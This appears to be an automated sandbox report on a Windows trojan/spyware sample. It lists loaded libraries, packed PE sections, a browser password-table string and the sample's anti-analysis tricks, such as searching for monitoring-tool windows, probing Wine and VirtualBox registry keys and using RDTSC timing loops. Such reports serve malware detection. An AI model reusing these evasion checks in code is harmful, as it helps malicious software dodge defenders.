                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_014587AF0_3_014587AF
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_014587AF0_3_014587AF
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_014587AF0_3_014587AF
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_014587AF0_3_014587AF
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_014587AF0_3_014587AF
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_014587AF0_3_014587AF
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A3720_3_0145A372
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A3720_3_0145A372
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A3720_3_0145A372
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A3720_3_0145A372
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A3720_3_0145A372
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A3720_3_0145A372
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A3720_3_0145A372
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: String function: 01459226 appears 49 times
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7200 -s 1928
                Source: Yh6fS6qfTE.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Yh6fS6qfTE.exeStatic PE information: Section: ZLIB complexity 0.9973713077910958
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@2/5@3/3
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7200
                Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\125fe084-288f-4be6-a2bd-1543967291b5Jump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1353167524.0000000005ABD000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1353018244.0000000005AD9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Yh6fS6qfTE.exeReversingLabs: Detection: 60%
                Source: Yh6fS6qfTE.exeVirustotal: Detection: 56%
                Source: Yh6fS6qfTE.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: Yh6fS6qfTE.exeString found in binary or memory: DRtlAllocateHeap3Cannot find '%s'. Please, re-install this applicationThunRTMain__vbaVarTstNeU
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile read: C:\Users\user\Desktop\Yh6fS6qfTE.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\Yh6fS6qfTE.exe "C:\Users\user\Desktop\Yh6fS6qfTE.exe"
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7200 -s 1928
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: Yh6fS6qfTE.exeStatic file information: File size 2968064 > 1048576
                Source: Yh6fS6qfTE.exeStatic PE information: Raw size of atqsxypq is bigger than: 0x100000 < 0x2ac800

                Data Obfuscation

                barindex
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeUnpacked PE file: 0.2.Yh6fS6qfTE.exe.f20000.0.unpack :EW;.rsrc :W;.idata :W;atqsxypq:EW;qsfumtfj:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;atqsxypq:EW;qsfumtfj:EW;.taggant:EW;
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: Yh6fS6qfTE.exeStatic PE information: real checksum: 0x2dab09 should be: 0x2ddd39
                Source: Yh6fS6qfTE.exeStatic PE information: section name:
                Source: Yh6fS6qfTE.exeStatic PE information: section name: .rsrc
                Source: Yh6fS6qfTE.exeStatic PE information: section name: .idata
                Source: Yh6fS6qfTE.exeStatic PE information: section name: atqsxypq
                Source: Yh6fS6qfTE.exeStatic PE information: section name: qsfumtfj
                Source: Yh6fS6qfTE.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A694 push esi; retf 0_3_0145A697
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A694 push esi; retf 0_3_0145A697
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A694 push esi; retf 0_3_0145A697
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A694 push esi; retf 0_3_0145A697
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A694 push esi; retf 0_3_0145A697
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A694 push esi; retf 0_3_0145A697
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A694 push esi; retf 0_3_0145A697
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A694 push esi; retf 0_3_0145A697
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A694 push esi; retf 0_3_0145A697
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A694 push esi; retf 0_3_0145A697
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A694 push esi; retf 0_3_0145A697
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A694 push esi; retf 0_3_0145A697
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A694 push esi; retf 0_3_0145A697
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A694 push esi; retf 0_3_0145A697
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A694 push esi; retf 0_3_0145A697
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A694 push esi; retf 0_3_0145A697
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A694 push esi; retf 0_3_0145A697
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A694 push esi; retf 0_3_0145A697
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A694 push esi; retf 0_3_0145A697
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A694 push esi; retf 0_3_0145A697
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A694 push esi; retf 0_3_0145A697
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A694 push esi; retf 0_3_0145A697
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A694 push esi; retf 0_3_0145A697
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A694 push esi; retf 0_3_0145A697
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A694 push esi; retf 0_3_0145A697
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A694 push esi; retf 0_3_0145A697
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A694 push esi; retf 0_3_0145A697
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A694 push esi; retf 0_3_0145A697
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A694 push esi; retf 0_3_0145A697
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A694 push esi; retf 0_3_0145A697
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A694 push esi; retf 0_3_0145A697
                Source: Yh6fS6qfTE.exeStatic PE information: section name: entropy: 7.987571678988286

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeWindow searched: window name: FilemonclassJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10F77DA second address: 10F77E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10F77E0 second address: 10F77FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007FD09CB0C7E6h 0x0000000e jmp 00007FD09CB0C7EDh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10F66B0 second address: 10F66B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10F6820 second address: 10F6824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10F6824 second address: 10F6828 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10F69D8 second address: 10F69F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD09CB0C7F7h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10F69F8 second address: 10F69FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10F69FC second address: 10F6A00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10F6A00 second address: 10F6A0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10F6A0C second address: 10F6A19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007FD09CB0C7E6h 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10F9F3E second address: 10F9F42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10FA065 second address: 10FA09D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CB0C7F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD09CB0C7F8h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10FA09D second address: 10FA0BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CF151C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10FA0BE second address: 10FA0CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD09CB0C7EAh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10FA0CD second address: 10FA0FA instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD09CF151B8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push edi 0x0000000f jc 00007FD09CF151BCh 0x00000015 jp 00007FD09CF151B6h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FD09CF151BBh 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10FA0FA second address: 10FA100 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10FA100 second address: 10FA104 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10FA104 second address: 10FA11A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 lea ebx, dword ptr [ebp+12455E22h] 0x0000000f clc 0x00000010 push eax 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10FA11A second address: 10FA11E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10FA11E second address: 10FA122 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10FA162 second address: 10FA1E3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD09CF151B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007FD09CF151C7h 0x00000010 jmp 00007FD09CF151C1h 0x00000015 popad 0x00000016 mov dword ptr [esp], eax 0x00000019 jmp 00007FD09CF151BAh 0x0000001e push 00000000h 0x00000020 mov dword ptr [ebp+122D35ECh], edx 0x00000026 push 4D6EDB1Fh 0x0000002b jmp 00007FD09CF151C2h 0x00000030 xor dword ptr [esp], 4D6EDB9Fh 0x00000037 mov edx, dword ptr [ebp+122D2CDDh] 0x0000003d push 00000003h 0x0000003f mov edx, dword ptr [ebp+122D3C24h] 0x00000045 push 00000000h 0x00000047 mov dword ptr [ebp+122D378Ch], ecx 0x0000004d add edx, dword ptr [ebp+122D2DF1h] 0x00000053 push 00000003h 0x00000055 mov si, 072Ah 0x00000059 push 49F5DD85h 0x0000005e pushad 0x0000005f push eax 0x00000060 push edx 0x00000061 push edx 0x00000062 pop edx 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10FA1E3 second address: 10FA1EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10FA1EC second address: 10FA1F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10FA1F2 second address: 10FA216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 add dword ptr [esp], 760A227Bh 0x0000000d mov dl, FDh 0x0000000f lea ebx, dword ptr [ebp+12455E2Bh] 0x00000015 mov si, bx 0x00000018 mov dword ptr [ebp+122D37E4h], edx 0x0000001e xchg eax, ebx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10FA216 second address: 10FA21A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
